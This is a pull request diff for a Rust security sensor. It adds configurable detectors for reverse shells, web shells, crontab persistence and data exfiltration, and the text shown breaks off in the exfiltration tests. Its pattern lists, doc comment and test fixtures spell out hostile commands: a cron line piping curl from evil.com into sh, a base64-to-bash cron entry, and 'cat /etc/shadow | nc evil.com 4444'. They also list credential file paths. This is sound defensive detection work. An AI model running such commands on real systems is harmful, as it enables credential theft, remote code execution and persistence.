### PR TITLE
feat: 6 new detectors — reverse shell, SSH key injection, web shell, kernel module, crontab persistence, data exfiltration

### DIFF
--- a/crates/sensor/src/config.rs
+++ b/crates/sensor/src/config.rs
@@ -229,6 +229,18 @@ pub struct DetectorsConfig {
     pub dns_tunneling: DnsTunnelingConfig,
     #[serde(default)]
     pub lateral_movement: LateralMovementConfig,
+    #[serde(default)]
+    pub reverse_shell: ReverseShellConfig,
+    #[serde(default)]
+    pub ssh_key_injection: SshKeyInjectionConfig,
+    #[serde(default)]
+    pub web_shell: WebShellConfig,
+    #[serde(default)]
+    pub kernel_module_load: KernelModuleLoadConfig,
+    #[serde(default)]
+    pub crontab_persistence: CrontabPersistenceConfig,
+    #[serde(default)]
+    pub data_exfiltration: DataExfiltrationConfig,
 }
 
 #[derive(Debug, Deserialize)]
@@ -514,6 +526,139 @@ impl Default for LateralMovementConfig {
             window_seconds: default_lateral_movement_window_seconds(),
         }
     }
+}
+
+#[derive(Debug, Deserialize)]
+pub struct ReverseShellConfig {
+    #[serde(default = "default_true")]
+    pub enabled: bool,
+    #[serde(default = "default_reverse_shell_cooldown_seconds")]
+    pub cooldown_seconds: u64,
+}
+
+impl Default for ReverseShellConfig {
+    fn default() -> Self {
+        Self {
+            enabled: true,
+            cooldown_seconds: default_reverse_shell_cooldown_seconds(),
+        }
+    }
+}
+
+#[derive(Debug, Deserialize)]
+pub struct SshKeyInjectionConfig {
+    #[serde(default = "default_true")]
+    pub enabled: bool,
+    #[serde(default = "default_ssh_key_injection_cooldown_seconds")]
+    pub cooldown_seconds: u64,
+}
+
+impl Default for SshKeyInjectionConfig {
+    fn default() -> Self {
+        Self {
+            enabled: true,
+            cooldown_seconds: default_ssh_key_injection_cooldown_seconds(),
+        }
+    }
+}
+
+#[derive(Debug, Deserialize)]
+pub struct WebShellConfig {
+    #[serde(default = "default_true")]
+    pub enabled: bool,
+    #[serde(default = "default_web_shell_cooldown_seconds")]
+    pub cooldown_seconds: u64,
+}
+
+impl Default for WebShellConfig {
+    fn default() -> Self {
+        Self {
+            enabled: true,
+            cooldown_seconds: default_web_shell_cooldown_seconds(),
+        }
+    }
+}
+
+#[derive(Debug, Deserialize)]
+pub struct KernelModuleLoadConfig {
+    #[serde(default = "default_true")]
+    pub enabled: bool,
+    #[serde(default = "default_kernel_module_load_cooldown_seconds")]
+    pub cooldown_seconds: u64,
+}
+
+impl Default for KernelModuleLoadConfig {
+    fn default() -> Self {
+        Self {
+            enabled: true,
+            cooldown_seconds: default_kernel_module_load_cooldown_seconds(),
+        }
+    }
+}
+
+#[derive(Debug, Deserialize)]
+pub struct CrontabPersistenceConfig {
+    #[serde(default = "default_true")]
+    pub enabled: bool,
+    #[serde(default = "default_crontab_persistence_cooldown_seconds")]
+    pub cooldown_seconds: u64,
+}
+
+impl Default for CrontabPersistenceConfig {
+    fn default() -> Self {
+        Self {
+            enabled: true,
+            cooldown_seconds: default_crontab_persistence_cooldown_seconds(),
+        }
+    }
+}
+
+#[derive(Debug, Deserialize)]
+pub struct DataExfiltrationConfig {
+    #[serde(default = "default_true")]
+    pub enabled: bool,
+    #[serde(default = "default_data_exfiltration_correlation_window_secs")]
+    pub correlation_window_secs: u64,
+    #[serde(default = "default_data_exfiltration_cooldown_seconds")]
+    pub cooldown_seconds: u64,
+}
+
+impl Default for DataExfiltrationConfig {
+    fn default() -> Self {
+        Self {
+            enabled: true,
+            correlation_window_secs: default_data_exfiltration_correlation_window_secs(),
+            cooldown_seconds: default_data_exfiltration_cooldown_seconds(),
+        }
+    }
+}
+
+fn default_kernel_module_load_cooldown_seconds() -> u64 {
+    600
+}
+
+fn default_crontab_persistence_cooldown_seconds() -> u64 {
+    300
+}
+
+fn default_data_exfiltration_correlation_window_secs() -> u64 {
+    60
+}
+
+fn default_data_exfiltration_cooldown_seconds() -> u64 {
+    300
+}
+
+fn default_reverse_shell_cooldown_seconds() -> u64 {
+    300
+}
+
+fn default_ssh_key_injection_cooldown_seconds() -> u64 {
+    600
+}
+
+fn default_web_shell_cooldown_seconds() -> u64 {
+    300
 }
 
 fn default_lateral_movement_ssh_threshold() -> usize {

--- a/crates/sensor/src/detectors/crontab_persistence.rs
+++ b/crates/sensor/src/detectors/crontab_persistence.rs
@@ -1,0 +1,518 @@
+use std::collections::HashMap;
+
+use chrono::{DateTime, Duration, Utc};
+use innerwarden_core::{event::Event, event::Severity, incident::Incident};
+
+/// Processes that legitimately modify crontabs.
+const ALLOWED_PROCESSES: &[&str] = &[
+    "cron",
+    "anacron",
+    "logrotate",
+    "apt",
+    "apt-get",
+    "dpkg",
+    "unattended-upgrades",
+    "unattended-upgrade",
+    "yum",
+    "dnf",
+    "rpm",
+];
+
+/// Crontab file/directory paths that indicate persistence.
+const CRON_PATHS: &[&str] = &[
+    "/var/spool/cron/crontabs/",
+    "/var/spool/cron/",
+    "/etc/cron.d/",
+    "/etc/crontab",
+    "/etc/cron.daily/",
+    "/etc/cron.hourly/",
+    "/etc/cron.weekly/",
+    "/etc/cron.monthly/",
+];
+
+/// Single-token patterns that indicate suspicious crontab content.
+const SUSPICIOUS_SINGLE_PATTERNS: &[&str] = &[
+    "/dev/tcp",
+    "base64 -d",
+    "base64 --decode",
+    "python -c",
+    "python3 -c",
+    "perl -e",
+    "nc -e",
+    "ncat -e",
+    "bash -i",
+];
+
+/// Paired patterns: both must appear in the command (download + execute combos).
+const SUSPICIOUS_PAIRS: &[(&str, &str)] = &[
+    ("curl", "| sh"),
+    ("curl", "|sh"),
+    ("curl", "| bash"),
+    ("curl", "|bash"),
+    ("wget", "| sh"),
+    ("wget", "|sh"),
+    ("wget", "| bash"),
+    ("wget", "|bash"),
+];
+
+/// Detects crontab modifications used for persistence.
+///
+/// Attackers commonly install crontab entries to maintain persistence on
+/// compromised systems. This detector catches:
+/// - File writes to crontab directories
+/// - Commands that edit or pipe to crontab
+/// - Commands that append to cron files via echo/redirection
+/// - File creation in /etc/cron.{daily,hourly,weekly}/
+///
+/// Legitimate system processes (cron, apt, logrotate) are allowlisted.
+pub struct CrontabPersistenceDetector {
+    cooldown: Duration,
+    alerted: HashMap<String, DateTime<Utc>>,
+    host: String,
+}
+
+impl CrontabPersistenceDetector {
+    pub fn new(host: impl Into<String>, cooldown_seconds: u64) -> Self {
+        Self {
+            cooldown: Duration::seconds(cooldown_seconds as i64),
+            alerted: HashMap::new(),
+            host: host.into(),
+        }
+    }
+
+    /// Check if the process name is in the allowlist.
+    fn is_allowed_process(comm: &str) -> bool {
+        ALLOWED_PROCESSES
+            .iter()
+            .any(|p| comm == *p || comm.starts_with(p))
+    }
+
+    /// Check if a file path is a cron-related path.
+    fn is_cron_path(path: &str) -> bool {
+        CRON_PATHS.iter().any(|p| path.starts_with(p))
+    }
+
+    /// Check if the command is a crontab modification command.
+    fn is_crontab_command(command: &str) -> bool {
+        let lower = command.to_lowercase();
+
+        // crontab -e or crontab - (pipe)
+        if lower.contains("crontab -e") || lower.contains("crontab -") {
+            return true;
+        }
+
+        // echo ... >> ... cron pattern
+        if (lower.contains("echo") || lower.contains("printf"))
+            && lower.contains(">>")
+            && lower.contains("cron")
+        {
+            return true;
+        }
+
+        // Direct write to cron paths via redirection
+        if lower.contains(">") {
+            for path in CRON_PATHS {
+                if lower.contains(path) {
+                    return true;
+                }
+            }
+        }
+
+        false
+    }
+
+    /// Check if the command contains suspicious content (download+execute, reverse shells).
+    fn has_suspicious_content(command: &str) -> bool {
+        let lower = command.to_lowercase();
+        if SUSPICIOUS_SINGLE_PATTERNS.iter().any(|p| lower.contains(p)) {
+            return true;
+        }
+        SUSPICIOUS_PAIRS
+            .iter()
+            .any(|(a, b)| lower.contains(a) && lower.contains(b))
+    }
+
+    pub fn process(&mut self, event: &Event) -> Option<Incident> {
+        let comm = event.details["comm"]
+            .as_str()
+            .unwrap_or("unknown")
+            .to_string();
+
+        // Skip allowlisted processes
+        if Self::is_allowed_process(&comm) {
+            return None;
+        }
+
+        let now = event.ts;
+
+        match event.kind.as_str() {
+            "file.write_access" => {
+                let path = event.details["path"].as_str().unwrap_or("");
+                if path.is_empty() || !Self::is_cron_path(path) {
+                    return None;
+                }
+
+                let pid = event.details["pid"].as_u64().unwrap_or(0) as u32;
+                let uid = event.details["uid"].as_u64().unwrap_or(0) as u32;
+
+                let alert_key = format!("cron_file:{}:{}", path, comm);
+                if self.is_in_cooldown(&alert_key, now) {
+                    return None;
+                }
+                self.alerted.insert(alert_key, now);
+
+                self.prune_stale(now);
+
+                Some(Incident {
+                    ts: now,
+                    host: self.host.clone(),
+                    incident_id: format!(
+                        "crontab_persistence:{}:{}:{}",
+                        comm,
+                        path,
+                        now.format("%Y-%m-%dT%H:%MZ")
+                    ),
+                    severity: Severity::High,
+                    title: format!("Crontab modification detected: {path}"),
+                    summary: format!(
+                        "Crontab persistence: {comm} (pid={pid}, uid={uid}) wrote to {path}"
+                    ),
+                    evidence: serde_json::json!([{
+                        "kind": "crontab_write",
+                        "path": path,
+                        "comm": comm,
+                        "pid": pid,
+                        "uid": uid,
+                    }]),
+                    recommended_checks: vec![
+                        format!("Inspect crontab file: cat {path}"),
+                        format!("Check who modified it: stat {path}"),
+                        format!("Review process tree: ps -o ppid= -p {pid}"),
+                        "List all user crontabs: for u in $(cut -f1 -d: /etc/passwd); do echo \"$u:\"; crontab -l -u $u 2>/dev/null; done".to_string(),
+                        "If unexpected: remove the crontab entry and investigate".to_string(),
+                    ],
+                    tags: vec![
+                        "persistence".to_string(),
+                        "crontab".to_string(),
+                    ],
+                    entities: vec![],
+                })
+            }
+            "shell.command_exec" => {
+                let command = event.details["command"].as_str().unwrap_or("");
+                if command.is_empty() || !Self::is_crontab_command(command) {
+                    return None;
+                }
+
+                let pid = event.details["pid"].as_u64().unwrap_or(0) as u32;
+                let uid = event.details["uid"].as_u64().unwrap_or(0) as u32;
+
+                let alert_key = format!("cron_cmd:{}:{}", comm, pid);
+                if self.is_in_cooldown(&alert_key, now) {
+                    return None;
+                }
+                self.alerted.insert(alert_key, now);
+
+                let severity = if Self::has_suspicious_content(command) {
+                    Severity::Critical
+                } else {
+                    Severity::High
+                };
+
+                let summary = if severity == Severity::Critical {
+                    format!(
+                        "Suspicious crontab persistence: {comm} (pid={pid}, uid={uid}) executed: {command}"
+                    )
+                } else {
+                    format!(
+                        "Crontab modification via command: {comm} (pid={pid}, uid={uid}) executed: {command}"
+                    )
+                };
+
+                self.prune_stale(now);
+
+                Some(Incident {
+                    ts: now,
+                    host: self.host.clone(),
+                    incident_id: format!(
+                        "crontab_persistence:{}:{}:{}",
+                        comm,
+                        pid,
+                        now.format("%Y-%m-%dT%H:%MZ")
+                    ),
+                    severity,
+                    title: format!("Crontab modification via command: {comm}"),
+                    summary,
+                    evidence: serde_json::json!([{
+                        "kind": "crontab_command",
+                        "command": command,
+                        "comm": comm,
+                        "pid": pid,
+                        "uid": uid,
+                    }]),
+                    recommended_checks: vec![
+                        "List all crontabs: crontab -l".to_string(),
+                        format!("Investigate process {comm} (pid={pid})"),
+                        "Check /etc/cron.d/ for new entries: ls -la /etc/cron.d/".to_string(),
+                        "If suspicious: remove the crontab entry and kill the process".to_string(),
+                    ],
+                    tags: vec!["persistence".to_string(), "crontab".to_string()],
+                    entities: vec![],
+                })
+            }
+            _ => None,
+        }
+    }
+
+    fn is_in_cooldown(&self, key: &str, now: DateTime<Utc>) -> bool {
+        if let Some(&last) = self.alerted.get(key) {
+            now - last < self.cooldown
+        } else {
+            false
+        }
+    }
+
+    fn prune_stale(&mut self, now: DateTime<Utc>) {
+        if self.alerted.len() > 500 {
+            let cutoff = now - self.cooldown;
+            self.alerted.retain(|_, ts| *ts > cutoff);
+        }
+    }
+}
+
+// ---------------------------------------------------------------------------
+// Tests
+// ---------------------------------------------------------------------------
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn file_write_event(path: &str, comm: &str, pid: u32, ts: DateTime<Utc>) -> Event {
+        Event {
+            ts,
+            host: "test".to_string(),
+            source: "ebpf".to_string(),
+            kind: "file.write_access".to_string(),
+            severity: Severity::Info,
+            summary: format!("File write: {path}"),
+            details: serde_json::json!({
+                "pid": pid,
+                "uid": 1000,
+                "comm": comm,
+                "path": path,
+            }),
+            tags: vec!["ebpf".to_string()],
+            entities: vec![],
+        }
+    }
+
+    fn command_event(command: &str, comm: &str, pid: u32, ts: DateTime<Utc>) -> Event {
+        Event {
+            ts,
+            host: "test".to_string(),
+            source: "ebpf".to_string(),
+            kind: "shell.command_exec".to_string(),
+            severity: Severity::Info,
+            summary: format!("Shell command: {command}"),
+            details: serde_json::json!({
+                "pid": pid,
+                "uid": 1000,
+                "comm": comm,
+                "command": command,
+            }),
+            tags: vec!["ebpf".to_string()],
+            entities: vec![],
+        }
+    }
+
+    #[test]
+    fn detects_crontab_file_write() {
+        let mut det = CrontabPersistenceDetector::new("test", 300);
+        let now = Utc::now();
+
+        let inc = det.process(&file_write_event(
+            "/var/spool/cron/crontabs/root",
+            "vi",
+            1234,
+            now,
+        ));
+        assert!(inc.is_some());
+        let inc = inc.unwrap();
+        assert_eq!(inc.severity, Severity::High);
+        assert!(inc.title.contains("/var/spool/cron/crontabs/root"));
+        assert!(inc.tags.contains(&"persistence".to_string()));
+        assert!(inc.tags.contains(&"crontab".to_string()));
+    }
+
+    #[test]
+    fn detects_etc_cron_d_write() {
+        let mut det = CrontabPersistenceDetector::new("test", 300);
+        let now = Utc::now();
+
+        let inc = det.process(&file_write_event("/etc/cron.d/backdoor", "bash", 1234, now));
+        assert!(inc.is_some());
+        assert!(inc.unwrap().title.contains("/etc/cron.d/backdoor"));
+    }
+
+    #[test]
+    fn detects_cron_daily_write() {
+        let mut det = CrontabPersistenceDetector::new("test", 300);
+        let now = Utc::now();
+
+        let inc = det.process(&file_write_event(
+            "/etc/cron.daily/malware",
+            "python3",
+            1234,
+            now,
+        ));
+        assert!(inc.is_some());
+        assert!(inc.unwrap().title.contains("/etc/cron.daily/malware"));
+    }
+
+    #[test]
+    fn detects_crontab_edit_command() {
+        let mut det = CrontabPersistenceDetector::new("test", 300);
+        let now = Utc::now();
+
+        let inc = det.process(&command_event("crontab -e", "bash", 1234, now));
+        assert!(inc.is_some());
+        let inc = inc.unwrap();
+        assert_eq!(inc.severity, Severity::High);
+    }
+
+    #[test]
+    fn detects_echo_cron_append() {
+        let mut det = CrontabPersistenceDetector::new("test", 300);
+        let now = Utc::now();
+
+        let inc = det.process(&command_event(
+            "echo '* * * * * /tmp/backdoor' >> /etc/cron.d/evil",
+            "bash",
+            1234,
+            now,
+        ));
+        assert!(inc.is_some());
+        let inc = inc.unwrap();
+        assert_eq!(inc.severity, Severity::High);
+    }
+
+    #[test]
+    fn critical_for_suspicious_content() {
+        let mut det = CrontabPersistenceDetector::new("test", 300);
+        let now = Utc::now();
+
+        let inc = det.process(&command_event(
+            "echo '* * * * * curl http://evil.com/payload|sh' | crontab -",
+            "bash",
+            1234,
+            now,
+        ));
+        assert!(inc.is_some());
+        let inc = inc.unwrap();
+        assert_eq!(inc.severity, Severity::Critical);
+        assert!(inc.summary.contains("Suspicious"));
+    }
+
+    #[test]
+    fn allows_system_processes() {
+        let mut det = CrontabPersistenceDetector::new("test", 300);
+        let now = Utc::now();
+
+        assert!(det
+            .process(&file_write_event(
+                "/var/spool/cron/crontabs/root",
+                "cron",
+                100,
+                now
+            ))
+            .is_none());
+        assert!(det
+            .process(&file_write_event("/etc/cron.d/apt-compat", "apt", 101, now))
+            .is_none());
+        assert!(det
+            .process(&file_write_event(
+                "/etc/cron.daily/logrotate",
+                "logrotate",
+                102,
+                now
+            ))
+            .is_none());
+        assert!(det
+            .process(&file_write_event("/etc/cron.d/dpkg", "dpkg", 103, now))
+            .is_none());
+    }
+
+    #[test]
+    fn cooldown_suppresses_realert() {
+        let mut det = CrontabPersistenceDetector::new("test", 300);
+        let now = Utc::now();
+
+        assert!(det
+            .process(&command_event("crontab -e", "bash", 1234, now))
+            .is_some());
+        assert!(det
+            .process(&command_event(
+                "crontab -e",
+                "bash",
+                1234,
+                now + Duration::seconds(10)
+            ))
+            .is_none());
+    }
+
+    #[test]
+    fn ignores_non_cron_file_writes() {
+        let mut det = CrontabPersistenceDetector::new("test", 300);
+        let now = Utc::now();
+
+        assert!(det
+            .process(&file_write_event("/etc/passwd", "vi", 1234, now))
+            .is_none());
+        assert!(det
+            .process(&file_write_event("/tmp/test.txt", "bash", 1235, now))
+            .is_none());
+    }
+
+    #[test]
+    fn ignores_non_cron_commands() {
+        let mut det = CrontabPersistenceDetector::new("test", 300);
+        let now = Utc::now();
+
+        assert!(det
+            .process(&command_event("ls -la /tmp", "bash", 1234, now))
+            .is_none());
+        assert!(det
+            .process(&command_event("cat /etc/crontab", "cat", 1235, now))
+            .is_none());
+    }
+
+    #[test]
+    fn detects_crontab_pipe_command() {
+        let mut det = CrontabPersistenceDetector::new("test", 300);
+        let now = Utc::now();
+
+        let inc = det.process(&command_event(
+            "echo '*/5 * * * * /usr/local/bin/update' | crontab -",
+            "bash",
+            1234,
+            now,
+        ));
+        assert!(inc.is_some());
+    }
+
+    #[test]
+    fn critical_for_base64_decode_in_cron() {
+        let mut det = CrontabPersistenceDetector::new("test", 300);
+        let now = Utc::now();
+
+        let inc = det.process(&command_event(
+            "echo '* * * * * echo dGVzdA== | base64 -d | bash' | crontab -",
+            "bash",
+            1234,
+            now,
+        ));
+        assert!(inc.is_some());
+        assert_eq!(inc.unwrap().severity, Severity::Critical);
+    }
+}

--- a/crates/sensor/src/detectors/data_exfiltration.rs
+++ b/crates/sensor/src/detectors/data_exfiltration.rs
@@ -1,0 +1,653 @@
+use std::collections::HashMap;
+
+use chrono::{DateTime, Duration, Utc};
+use innerwarden_core::{entities::EntityRef, event::Event, event::Severity, incident::Incident};
+
+/// Sensitive file patterns that indicate credential/data access.
+const SENSITIVE_PATHS: &[&str] = &[
+    "/etc/shadow",
+    "/etc/passwd",
+    "/etc/master.passwd",
+    "/etc/security/passwd",
+];
+
+/// Sensitive path suffixes/patterns.
+const SENSITIVE_SUFFIXES: &[&str] = &[
+    ".ssh/id_rsa",
+    ".ssh/id_ed25519",
+    ".ssh/id_ecdsa",
+    ".ssh/id_dsa",
+    ".ssh/authorized_keys",
+    ".ssh/known_hosts",
+    ".aws/credentials",
+    ".aws/config",
+    ".env",
+    ".pem",
+    ".key",
+    ".p12",
+    ".pfx",
+];
+
+/// Sensitive file extensions for database dumps.
+const SENSITIVE_EXTENSIONS: &[&str] = &[".sql", ".dump", ".bak"];
+
+/// Command patterns that pipe sensitive files to network tools.
+const EXFIL_COMMAND_PATTERNS: &[(&str, &str)] = &[
+    ("cat", "nc"),
+    ("cat", "ncat"),
+    ("cat", "netcat"),
+    ("cat", "curl"),
+    ("cat", "wget"),
+    ("tar", "curl"),
+    ("tar", "nc"),
+    ("tar", "ncat"),
+    ("tar", "ssh"),
+    ("scp", "shadow"),
+    ("scp", "passwd"),
+    ("scp", ".ssh"),
+    ("scp", ".aws"),
+    ("scp", ".env"),
+    ("scp", ".pem"),
+    ("scp", ".key"),
+];
+
+/// Detects data exfiltration from the server.
+///
+/// Two detection modes:
+/// 1. **Correlation**: Tracks when sensitive files are read, then checks if
+///    the same process makes an outbound network connection within a time window.
+/// 2. **Command pattern**: Detects commands that pipe sensitive files directly
+///    to network tools (e.g., `cat /etc/shadow | nc evil.com 4444`).
+pub struct DataExfiltrationDetector {
+    correlation_window: Duration,
+    cooldown: Duration,
+    /// pid → (timestamp, file_path) — tracks sensitive file reads
+    read_state: HashMap<u32, (DateTime<Utc>, String)>,
+    /// Alert cooldown tracking
+    alerted: HashMap<String, DateTime<Utc>>,
+    host: String,
+}
+
+impl DataExfiltrationDetector {
+    pub fn new(
+        host: impl Into<String>,
+        correlation_window_secs: u64,
+        cooldown_seconds: u64,
+    ) -> Self {
+        Self {
+            correlation_window: Duration::seconds(correlation_window_secs as i64),
+            cooldown: Duration::seconds(cooldown_seconds as i64),
+            read_state: HashMap::new(),
+            alerted: HashMap::new(),
+            host: host.into(),
+        }
+    }
+
+    /// Check if a path is a sensitive file.
+    fn is_sensitive_path(path: &str) -> bool {
+        if SENSITIVE_PATHS.contains(&path) {
+            return true;
+        }
+        for suffix in SENSITIVE_SUFFIXES {
+            if path.ends_with(suffix) || path.contains(suffix) {
+                return true;
+            }
+        }
+        for ext in SENSITIVE_EXTENSIONS {
+            if path.ends_with(ext) {
+                return true;
+            }
+        }
+        false
+    }
+
+    /// Check if a command contains a direct exfiltration pattern.
+    fn is_exfil_command(command: &str) -> bool {
+        let lower = command.to_lowercase();
+
+        // Check for piping sensitive files to network tools
+        for (source_tool, network_tool) in EXFIL_COMMAND_PATTERNS {
+            if lower.contains(source_tool) && lower.contains(network_tool) {
+                // Verify there's also a sensitive reference
+                if Self::command_references_sensitive(&lower) {
+                    return true;
+                }
+                // tar + network tool is suspicious regardless
+                if *source_tool == "tar" {
+                    return true;
+                }
+                // scp patterns already include sensitive references
+                if *source_tool == "scp" {
+                    return true;
+                }
+            }
+        }
+
+        false
+    }
+
+    /// Check if a command references sensitive files.
+    fn command_references_sensitive(command: &str) -> bool {
+        for path in SENSITIVE_PATHS {
+            if command.contains(path) {
+                return true;
+            }
+        }
+        for suffix in SENSITIVE_SUFFIXES {
+            if command.contains(suffix) {
+                return true;
+            }
+        }
+        false
+    }
+
+    pub fn process(&mut self, event: &Event) -> Option<Incident> {
+        let now = event.ts;
+
+        match event.kind.as_str() {
+            // Track sensitive file reads
+            "file.read_access" => {
+                let path = event.details["path"].as_str().unwrap_or("");
+                if path.is_empty() || !Self::is_sensitive_path(path) {
+                    return None;
+                }
+
+                let pid = event.details["pid"].as_u64().unwrap_or(0) as u32;
+                if pid == 0 {
+                    return None;
+                }
+
+                self.read_state.insert(pid, (now, path.to_string()));
+
+                // Prune stale entries
+                if self.read_state.len() > 5000 {
+                    let cutoff = now - self.correlation_window;
+                    self.read_state.retain(|_, (ts, _)| *ts > cutoff);
+                }
+
+                None
+            }
+
+            // Check if a process that read sensitive files is now connecting out
+            "network.outbound_connect" | "network.connection" => {
+                let pid = event.details["pid"].as_u64().unwrap_or(0) as u32;
+                if pid == 0 {
+                    return None;
+                }
+
+                let dst_ip = event.details["dst_ip"].as_str().unwrap_or("");
+                let dst_port = event.details["dst_port"].as_u64().unwrap_or(0) as u16;
+                let comm = event.details["comm"]
+                    .as_str()
+                    .unwrap_or("unknown")
+                    .to_string();
+
+                // Check if this pid read a sensitive file recently
+                if let Some((read_ts, sensitive_file)) = self.read_state.get(&pid) {
+                    if now - *read_ts <= self.correlation_window {
+                        let alert_key = format!("exfil:{}:{}:{}", comm, sensitive_file, dst_ip);
+                        if self.is_in_cooldown(&alert_key, now) {
+                            return None;
+                        }
+                        self.alerted.insert(alert_key, now);
+
+                        let sensitive_file = sensitive_file.clone();
+
+                        self.prune_stale(now);
+
+                        return Some(Incident {
+                            ts: now,
+                            host: self.host.clone(),
+                            incident_id: format!(
+                                "data_exfil:{}:{}:{}",
+                                comm,
+                                dst_ip,
+                                now.format("%Y-%m-%dT%H:%MZ")
+                            ),
+                            severity: Severity::High,
+                            title: format!(
+                                "Data exfiltration: {comm} read {sensitive_file} then connected to {dst_ip}"
+                            ),
+                            summary: format!(
+                                "Data exfiltration: {comm} read {sensitive_file} then connected to {dst_ip}:{dst_port}"
+                            ),
+                            evidence: serde_json::json!([{
+                                "kind": "data_exfiltration",
+                                "pattern": "read_then_connect",
+                                "sensitive_file": sensitive_file,
+                                "comm": comm,
+                                "pid": pid,
+                                "dst_ip": dst_ip,
+                                "dst_port": dst_port,
+                            }]),
+                            recommended_checks: vec![
+                                format!("Investigate process {comm} (pid={pid}) — why did it read {sensitive_file}?"),
+                                format!("Check destination: whois {dst_ip}"),
+                                format!("Review network traffic: ss -tunp | grep {pid}"),
+                                "Check if the file was modified: stat the sensitive file".to_string(),
+                                "If confirmed: block the destination IP and kill the process".to_string(),
+                            ],
+                            tags: vec![
+                                "exfiltration".to_string(),
+                                "data-theft".to_string(),
+                            ],
+                            entities: vec![EntityRef::ip(dst_ip)],
+                        });
+                    }
+                }
+
+                None
+            }
+
+            // Detect command-based exfiltration patterns
+            "shell.command_exec" => {
+                let command = event.details["command"].as_str().unwrap_or("");
+                if command.is_empty() || !Self::is_exfil_command(command) {
+                    return None;
+                }
+
+                let pid = event.details["pid"].as_u64().unwrap_or(0) as u32;
+                let uid = event.details["uid"].as_u64().unwrap_or(0) as u32;
+                let comm = event.details["comm"]
+                    .as_str()
+                    .unwrap_or("unknown")
+                    .to_string();
+
+                let alert_key = format!("exfil_cmd:{}:{}", comm, pid);
+                if self.is_in_cooldown(&alert_key, now) {
+                    return None;
+                }
+                self.alerted.insert(alert_key, now);
+
+                self.prune_stale(now);
+
+                Some(Incident {
+                    ts: now,
+                    host: self.host.clone(),
+                    incident_id: format!(
+                        "data_exfil_cmd:{}:{}:{}",
+                        comm,
+                        pid,
+                        now.format("%Y-%m-%dT%H:%MZ")
+                    ),
+                    severity: Severity::High,
+                    title: format!("Data exfiltration command detected: {comm}"),
+                    summary: format!(
+                        "Data exfiltration via command: {comm} (pid={pid}, uid={uid}) executed: {command}"
+                    ),
+                    evidence: serde_json::json!([{
+                        "kind": "data_exfiltration",
+                        "pattern": "command_pipe",
+                        "command": command,
+                        "comm": comm,
+                        "pid": pid,
+                        "uid": uid,
+                    }]),
+                    recommended_checks: vec![
+                        format!("Investigate process {comm} (pid={pid}) — who started it?"),
+                        "Check for stolen data: review network logs".to_string(),
+                        format!("Review command: {command}"),
+                        "If confirmed: block the destination and rotate compromised credentials".to_string(),
+                    ],
+                    tags: vec![
+                        "exfiltration".to_string(),
+                        "data-theft".to_string(),
+                    ],
+                    entities: vec![],
+                })
+            }
+
+            _ => None,
+        }
+    }
+
+    fn is_in_cooldown(&self, key: &str, now: DateTime<Utc>) -> bool {
+        if let Some(&last) = self.alerted.get(key) {
+            now - last < self.cooldown
+        } else {
+            false
+        }
+    }
+
+    fn prune_stale(&mut self, now: DateTime<Utc>) {
+        if self.alerted.len() > 500 {
+            let cutoff = now - self.cooldown;
+            self.alerted.retain(|_, ts| *ts > cutoff);
+        }
+    }
+}
+
+// ---------------------------------------------------------------------------
+// Tests
+// ---------------------------------------------------------------------------
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn file_read_event(path: &str, comm: &str, pid: u32, ts: DateTime<Utc>) -> Event {
+        Event {
+            ts,
+            host: "test".to_string(),
+            source: "ebpf".to_string(),
+            kind: "file.read_access".to_string(),
+            severity: Severity::Info,
+            summary: format!("File read: {path}"),
+            details: serde_json::json!({
+                "pid": pid,
+                "uid": 1000,
+                "comm": comm,
+                "path": path,
+            }),
+            tags: vec!["ebpf".to_string()],
+            entities: vec![],
+        }
+    }
+
+    fn connect_event(
+        comm: &str,
+        pid: u32,
+        dst_ip: &str,
+        dst_port: u16,
+        ts: DateTime<Utc>,
+    ) -> Event {
+        Event {
+            ts,
+            host: "test".to_string(),
+            source: "ebpf".to_string(),
+            kind: "network.outbound_connect".to_string(),
+            severity: Severity::Info,
+            summary: format!("{comm} connecting to {dst_ip}:{dst_port}"),
+            details: serde_json::json!({
+                "pid": pid,
+                "uid": 1000,
+                "comm": comm,
+                "dst_ip": dst_ip,
+                "dst_port": dst_port,
+            }),
+            tags: vec!["ebpf".to_string()],
+            entities: vec![EntityRef::ip(dst_ip)],
+        }
+    }
+
+    fn command_event(command: &str, comm: &str, pid: u32, ts: DateTime<Utc>) -> Event {
+        Event {
+            ts,
+            host: "test".to_string(),
+            source: "ebpf".to_string(),
+            kind: "shell.command_exec".to_string(),
+            severity: Severity::Info,
+            summary: format!("Shell command: {command}"),
+            details: serde_json::json!({
+                "pid": pid,
+                "uid": 1000,
+                "comm": comm,
+                "command": command,
+            }),
+            tags: vec!["ebpf".to_string()],
+            entities: vec![],
+        }
+    }
+
+    #[test]
+    fn detects_shadow_read_then_connect() {
+        let mut det = DataExfiltrationDetector::new("test", 60, 300);
+        let now = Utc::now();
+
+        // Process reads /etc/shadow
+        assert!(det
+            .process(&file_read_event("/etc/shadow", "python3", 1234, now))
+            .is_none());
+
+        // Same process connects outbound within window
+        let inc = det.process(&connect_event(
+            "python3",
+            1234,
+            "203.0.113.5",
+            4444,
+            now + Duration::seconds(5),
+        ));
+        assert!(inc.is_some());
+        let inc = inc.unwrap();
+        assert_eq!(inc.severity, Severity::High);
+        assert!(inc.title.contains("/etc/shadow"));
+        assert!(inc.title.contains("203.0.113.5"));
+        assert!(inc.tags.contains(&"exfiltration".to_string()));
+    }
+
+    #[test]
+    fn detects_ssh_key_read_then_connect() {
+        let mut det = DataExfiltrationDetector::new("test", 60, 300);
+        let now = Utc::now();
+
+        assert!(det
+            .process(&file_read_event("/root/.ssh/id_rsa", "bash", 1234, now))
+            .is_none());
+
+        let inc = det.process(&connect_event(
+            "bash",
+            1234,
+            "10.0.0.5",
+            8080,
+            now + Duration::seconds(30),
+        ));
+        assert!(inc.is_some());
+        assert!(inc.unwrap().title.contains(".ssh/id_rsa"));
+    }
+
+    #[test]
+    fn detects_aws_credentials_read_then_connect() {
+        let mut det = DataExfiltrationDetector::new("test", 60, 300);
+        let now = Utc::now();
+
+        assert!(det
+            .process(&file_read_event(
+                "/home/user/.aws/credentials",
+                "python3",
+                2000,
+                now
+            ))
+            .is_none());
+
+        let inc = det.process(&connect_event(
+            "python3",
+            2000,
+            "1.2.3.4",
+            443,
+            now + Duration::seconds(10),
+        ));
+        assert!(inc.is_some());
+        assert!(inc.unwrap().title.contains(".aws/credentials"));
+    }
+
+    #[test]
+    fn no_alert_outside_correlation_window() {
+        let mut det = DataExfiltrationDetector::new("test", 60, 300);
